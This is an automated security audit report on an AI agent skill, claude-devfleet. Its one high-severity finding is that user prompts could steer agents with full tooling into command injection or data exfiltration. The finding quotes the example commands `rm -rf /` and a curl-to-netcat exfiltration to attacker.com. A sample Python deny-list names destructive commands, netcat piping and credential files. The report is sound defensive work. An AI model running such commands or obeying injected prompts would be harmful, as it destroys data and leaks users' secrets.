Security Audit
Jamkris/everything-gemini-code:skills/claude-devfleet
github.com/Jamkris/everything-gemini-code

Trust Assessment
Jamkris/everything-gemini-code:skills/claude-devfleet received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified one finding: 0 critical, 1 high, 0 medium, and 0 low severity. The key finding: the agents' 'full tooling' enables command injection and data exfiltration via user prompts.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on March 30, 2026 (commit 6c6f43aa). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (1)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| HIGH | Agent 'full tooling' enables command injection and data exfiltration via user prompts | LLM | SKILL.md:17 |

The skill description explicitly states that "Each agent runs in an isolated git worktree with full tooling." The `plan_project` and `create_mission` tools accept user-provided prompts, which are then interpreted by an AI agent within the DevFleet system. This 'full tooling' capability, combined with user-controlled prompts, creates a credible exploit path for command injection and data exfiltration. If the underlying DevFleet agents are not rigorously sandboxed, a malicious user prompt could instruct an agent to execute arbitrary commands (e.g., `rm -rf /`, `curl sensitive_data | nc attacker.com`) or exfiltrate data from the agent's environment, or even from the host system if the isolation is weak. The skill acts as a conduit that carries these potentially malicious instructions to the powerful agents.

Recommended mitigations:
- Run the `claude-devfleet` instance and its agents in a strictly sandboxed environment with the minimum necessary permissions.
- Implement robust input validation and sanitization for prompts passed to `plan_project` and `create_mission` so malicious instructions never reach the agents.
- Restrict the 'full tooling' capabilities, or grant the agents a more granular set of tools.
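One way to approach the prompt-validation mitigation is a screening gate in front of the tool calls. The sketch below is a minimal, illustrative example and is not part of the audited skill: the pattern list is an assumption, deliberately incomplete, and a deny-list alone cannot stop a determined attacker; it should be layered with agent-side sandboxing.

```python
import re

# Illustrative deny-list of patterns that commonly signal shell injection
# or data exfiltration attempts. Not exhaustive; combine with sandboxing.
SUSPICIOUS_PATTERNS = [
    r"rm\s+-rf",                        # destructive filesystem commands
    r"\|\s*nc\b",                       # piping output to netcat
    r"curl\s+\S+\s*\|",                 # curl piped into another command
    r"\$\(",                            # shell command substitution
    r"id_rsa|\.aws/credentials",        # credential material
]

def screen_prompt(prompt: str) -> str:
    """Reject prompts matching known injection/exfiltration patterns.

    Returns the prompt unchanged if it passes; raises ValueError otherwise.
    """
    for pattern in SUSPICIOUS_PATTERNS:
        if re.search(pattern, prompt, re.IGNORECASE):
            raise ValueError(f"prompt rejected: matched {pattern!r}")
    return prompt
```

A caller would run user input through `screen_prompt` before forwarding it to `plan_project` or `create_mission`, logging rejections for review rather than silently dropping them.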
Full report: https://skillshield.io/report/db5977f47a1b59f2

Powered by SkillShield